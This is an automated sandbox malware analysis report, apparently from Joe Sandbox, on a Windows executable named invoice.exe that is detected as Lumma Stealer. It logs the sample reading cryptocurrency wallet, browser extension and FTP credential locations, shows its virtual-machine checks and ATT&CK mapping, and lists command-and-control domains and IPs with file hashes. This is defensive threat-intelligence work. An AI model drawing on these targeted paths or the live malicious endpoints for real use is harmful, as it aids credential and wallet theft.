              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 0.2.invoice.exe.2760000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.invoice.exe.27c0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.invoice.exe.2760000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1003304693.0000000002760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              21
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              321
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Obfuscated Files or Information
              LSASS Memory21
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol31
              Data from Local System
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Software Packing
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading
              NTDS1
              File and Directory Discovery
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets22
              System Information Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1654483 Sample: invoice.exe Startdate: 02/04/2025 Architecture: WINDOWS Score: 100 10 ferroyxo.run 2->10 12 pki-goog.l.google.com 2->12 14 2 other IPs or domains 2->14 18 Found malware configuration 2->18 20 Antivirus detection for URL or domain 2->20 22 Multi AV Scanner detection for submitted file 2->22 24 5 other signatures 2->24 6 invoice.exe 2->6         started        signatures3 process4 dnsIp5 16 ferroyxo.run 172.67.131.170, 443, 49681, 49682 CLOUDFLARENETUS United States 6->16 26 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 6->26 28 Query firmware table information (likely to detect VMs) 6->28 30 Tries to harvest and steal ftp login credentials 6->30 32 2 other signatures 6->32 signatures6

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              invoice.exe64%VirustotalBrowse
              invoice.exe53%ReversingLabsWin32.Trojan.LummaStealer
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://ferroyxo.run/7g100%Avira URL Cloudmalware
              https://ferroyxo.run/quiwdz100%Avira URL Cloudmalware
              https://ferroyxo.run/7100%Avira URL Cloudmalware
              https://ferroyxo.run/quiwdzr2100%Avira URL Cloudmalware
              ferroyxo.run/quiwdz100%Avira URL Cloudmalware
              https://ferroyxo.run/100%Avira URL Cloudmalware
              https://ferroyxo.run/quiwdzb100%Avira URL Cloudmalware
              https://ferroyxo.run/quiwdz55100%Avira URL Cloudmalware

              Download Network PCAP: filteredfull

              NameIPActiveMaliciousAntivirus DetectionReputation
              ferroyxo.run
              172.67.131.170
              truetrue
                unknown
                bg.microsoft.map.fastly.net
                199.232.210.172
                truefalse
                  high
                  pki-goog.l.google.com
                  172.217.165.131
                  truefalse
                    high
                    c.pki.goog
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      weldorae.digital/gedsfalse
                        high
                        oreheatq.live/gsoppfalse
                          high
                          steelixr.live/aguizfalse
                            high
                            https://ferroyxo.run/quiwdzfalse
                            • Avira URL Cloud: malware
                            unknown
                            smeltingt.run/giiausfalse
                              high
                              castmaxw.run/ganzdefalse
                                high
                                targett.top/dsANGtfalse
                                  high
                                  ferromny.digital/gwpdfalse
                                    high
                                    advennture.top/GKsiiofalse
                                      high
                                      ferroyxo.run/quiwdztrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://ferroyxo.run/quiwdzbinvoice.exe, 00000000.00000002.1003081386.0000000000838000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://ferroyxo.run/invoice.exe, 00000000.00000003.979670115.0000000000838000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://duckduckgo.com/ac/?q=invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://ferroyxo.run/quiwdzr2invoice.exe, 00000000.00000003.972990055.0000000000838000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://crl.rootca1.amazontrust.com/rootca1.crl0invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://ac.ecosia.org?q=invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://ocsp.rootca1.amazontrust.com0:invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brinvoice.exe, 00000000.00000003.945225432.000000000336B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ferroyxo.run/7invoice.exe, 00000000.00000002.1003081386.0000000000838000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.972990055.0000000000838000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://ferroyxo.run/7ginvoice.exe, 00000000.00000003.979948724.0000000000838000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.994824179.0000000000838000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.979670115.0000000000838000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://www.google.com/images/branding/product/ico/googleg_alldp.icoinvoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.ecosia.org/newtab/v20invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ferroyxo.run/quiwdz55invoice.exe, 00000000.00000002.1003081386.0000000000838000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://x1.c.lencr.org/0invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://x1.i.lencr.org/0invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://duckduckgo.com/chrome_newtabv20invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchinvoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://support.mozilla.org/products/firefoxgro.allinvoice.exe, 00000000.00000003.945225432.000000000336B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://gemini.google.com/app?q=invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        172.67.131.170
                                                                        ferroyxo.runUnited States
                                                                        13335CLOUDFLARENETUStrue
                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                        Analysis ID:1654483
                                                                        Start date and time:2025-04-02 11:41:46 +02:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 3m 17s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:2
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:invoice.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@1/0@2/1
                                                                        EGA Information:Failed
                                                                        HCA Information:
                                                                        • Successful, ratio: 100%
                                                                        • Number of executed functions: 0
                                                                        • Number of non-executed functions: 3
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Stop behavior analysis, all processes terminated
                                                                        • Exclude process from analysis (whitelisted): SIHClient.exe
                                                                        • Excluded IPs from analysis (whitelisted): 52.149.20.212, 52.165.164.15
                                                                        • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target invoice.exe, PID 6892 because there are no executed function
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        TimeTypeDescription
                                                                        05:42:45API Interceptor7x Sleep call for process: invoice.exe modified
                                                                        No context
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        pki-goog.l.google.comrandom.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 142.250.80.35
                                                                        NVIDIA.exeGet hashmaliciousPureCrypter, AsyncRATBrowse
                                                                        • 142.251.35.163
                                                                        a.ps1Get hashmaliciousPureCrypter, AsyncRATBrowse
                                                                        • 142.250.81.227
                                                                        PO-GST-20250401.vbsGet hashmaliciousRemcosBrowse
                                                                        • 142.251.32.99
                                                                        REQUEST FOR PRICE QUOTATION FOR THE REVISED ITEMS.exeGet hashmaliciousUnknownBrowse
                                                                        • 142.250.65.227
                                                                        cz4ZwB7N4G.exeGet hashmaliciousUnknownBrowse
                                                                        • 142.250.80.99
                                                                        https://maltese.com.br/share-sensitive-files-securely/Get hashmaliciousHTMLPhisherBrowse
                                                                        • 142.250.80.35
                                                                        uninstall.exeGet hashmaliciousUnknownBrowse
                                                                        • 142.250.65.227
                                                                        VUE-KMH-462E Missed Amex Entry-Mar-25 1.xlsmGet hashmaliciousUnknownBrowse
                                                                        • 142.250.65.163
                                                                        cRDJEdXHDo.dllGet hashmaliciousUnknownBrowse
                                                                        • 142.251.40.131
                                                                        bg.microsoft.map.fastly.netrandom.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 199.232.214.172
                                                                        NVIDIA.exeGet hashmaliciousPureCrypter, AsyncRATBrowse
                                                                        • 199.232.214.172
                                                                        3UQbvgGmir.exeGet hashmaliciousAsyncRATBrowse
                                                                        • 199.232.210.172
                                                                        qWR3lUj.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 199.232.210.172
                                                                        index.exeGet hashmaliciousPureCrypter, AsyncRATBrowse
                                                                        • 199.232.214.172
                                                                        a.ps1Get hashmaliciousPureCrypter, AsyncRATBrowse
                                                                        • 199.232.210.172
                                                                        NVIDIA.exeGet hashmaliciousPureCrypter, AsyncRATBrowse
                                                                        • 199.232.210.172
                                                                        a.ps1Get hashmaliciousPureCrypter, AsyncRATBrowse
                                                                        • 199.232.214.172
                                                                        index.exeGet hashmaliciousPureCrypter, AsyncRATBrowse
                                                                        • 199.232.210.172
                                                                        PO-GST-20250401.vbsGet hashmaliciousRemcosBrowse
                                                                        • 199.232.210.172
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CLOUDFLARENETUSrandom.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.197.67
                                                                        random.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.16.1
                                                                        random.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.80.1
                                                                        random.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.197.67
                                                                        PQPYAYJJ.exeGet hashmaliciousAmadeyBrowse
                                                                        • 172.67.184.191
                                                                        L6qFGFpZpp.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.52.83
                                                                        qWR3lUj.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.52.83
                                                                        zzX3PUhPOA.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.52.83
                                                                        EdnFwO343A.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.16.1
                                                                        https://maxenerwellness.com/Get hashmaliciousUnknownBrowse
                                                                        • 104.17.24.14
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        a0e9f5d64349fb13191bc781f81f42e1random.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.131.170
                                                                        random.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.131.170
                                                                        random.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.131.170
                                                                        random.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.131.170
                                                                        L6qFGFpZpp.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.131.170
                                                                        qWR3lUj.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.131.170
                                                                        zzX3PUhPOA.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.131.170
                                                                        EdnFwO343A.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.131.170
                                                                        yuioiuy.txt.ps1Get hashmaliciousUnknownBrowse
                                                                        • 172.67.131.170
                                                                        cfr4.txt.ps1Get hashmaliciousUnknownBrowse
                                                                        • 172.67.131.170
                                                                        No context
                                                                        No created / dropped files found
                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.338436894896284
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:invoice.exe
                                                                        File size:845'824 bytes
                                                                        MD5:57bcb61167abd03d9d98705ab39e79ab
                                                                        SHA1:487af25088915c0506635a7bd44cd65177f91689
                                                                        SHA256:7c321f8a0d6c357d3406afb96408968d107c81f8282e2353ea4cebed67432f88
                                                                        SHA512:45779c2b678df42f9f3e36501e95a17c32c5a0a694c03b5caaf2014d07aba79b569271a6bf83a0e87836c3f78f140ab3b50bb2d7eb21de44d01bf547b249837f
                                                                        SSDEEP:24576:BAzEBC+2X2jofsfO1AVPul+3Dhs2ccmsh:BAz+J2mMfd1LDlRsh
                                                                        TLSH:2B055A816AD703E5EA0DEC35441173BE468BADDDD9E1CA1ECCC60ECA6E86BD6101335E
